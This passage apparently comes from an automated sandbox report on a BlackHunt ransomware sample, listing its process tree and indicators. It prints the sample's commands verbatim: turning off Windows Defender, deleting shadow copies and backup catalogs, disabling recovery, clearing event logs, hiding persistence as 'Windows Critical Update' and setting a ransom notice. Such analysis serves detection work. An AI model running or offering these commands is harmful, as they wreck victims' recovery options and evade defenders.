memory of 4264 4900 cmd.exe 114 PID 2956 wrote to memory of 3388 2956 a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe 118 PID 2956 wrote to memory of 3388 2956 a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe 118 PID 4576 wrote to memory of 3488 4576 cmd.exe 116 PID 4576 wrote to memory of 3488 4576 cmd.exe 116 PID 760 wrote to memory of 4768 760 reg.exe 119 PID 760 wrote to memory of 4768 760 reg.exe 119 PID 2956 wrote to memory of 952 2956 a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe 120 PID 2956 wrote to memory of 952 2956 a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe 120 PID 2956 wrote to memory of 3032 2956 a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe 122 PID 2956 wrote to memory of 3032 2956 a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe 122 PID 2956 wrote to memory of 3216 2956 a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe 124 PID 2956 wrote to memory of 3216 2956 a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe 124 PID 2244 wrote to memory of 4060 2244 vssadmin.exe 126 PID 2244 wrote to memory of 4060 2244 vssadmin.exe 126 PID 3388 wrote to memory of 1804 3388 cmd.exe 127 PID 3388 wrote to memory of 1804 3388 cmd.exe 127 PID 2956 wrote to memory of 3844 2956 a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe 128 PID 2956 wrote to memory of 3844 2956 a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe 128 PID 952 wrote to memory of 2028 952 cmd.exe 130 PID 952 wrote to memory of 2028 952 cmd.exe 130 PID 2956 wrote to memory of 4028 2956 a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe 131 PID 2956 wrote to memory of 4028 2956 a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe 131 PID 3032 wrote to memory of 4352 3032 cmd.exe 191 PID 3032 wrote to memory of 4352 3032 cmd.exe 191 PID 3216 wrote to memory of 5100 3216 cmd.exe 197 PID 3216 wrote to memory of 5100 3216 cmd.exe 197 PID 2956 wrote to memory of 2284 2956 a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe 135 PID 2956 wrote to memory of 2284 2956 a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe 135 PID 2956 wrote to memory of 3716 2956 a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe 138 PID 2956 wrote to memory of 3716 2956 a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe 138 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe"C:\Users\Admin\AppData\Local\Temp\a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2956 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3320 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:4384
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:992 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵PID:4140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3460 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:4488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1580 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:3972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2404
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3944 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:1904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4900 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4264
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4576 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:3488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:760
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:4768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2244
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:4060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3388 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:1804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:952 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:2028
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3032 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:4352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3216 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:5100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:3844
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:2444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:4028
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:3628
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2284
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:5000
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:4424
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3716
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:220
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:944
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:412
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2084
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:2024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:880
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:1364
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:516
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵
- Modifies registry class
PID:4140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:4420
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:404
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:2060
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:4044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4928
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2936
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2296
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:4756
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:4516
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:4464
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵
- Suspicious use of WriteProcessMemory
PID:760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe" /F2⤵PID:4452
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe" /F3⤵
- Creates scheduled task(s)
PID:3304
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2204
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
- Suspicious use of WriteProcessMemory
PID:2244
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:3420
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4248
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:1352
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:4896
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:3356
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:10508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:4972
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:11472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:4352
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:9116
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:3160
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:5100
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:6168
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:3988
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:11716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:4160
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:5924
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:4416
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:13328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:10416
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:13344
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:12600
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:13396
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:13408
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:7752
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:516
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:7372
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:3356
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:6664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:2520
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:7280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:8020
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:13360
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:7216
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:7312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:13428
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:7592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:13412
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:5328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:6716
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:14080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:6096
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:3980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:7644
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:13472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:10200
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:11568
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:13564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:3948
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:13580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:8708
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:13588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:7888
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2464
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:7928
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:13680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:13032
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:13620
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:8848 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:13744
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 13744 -s 14684⤵
- Program crash
PID:13892
-
-
-
-
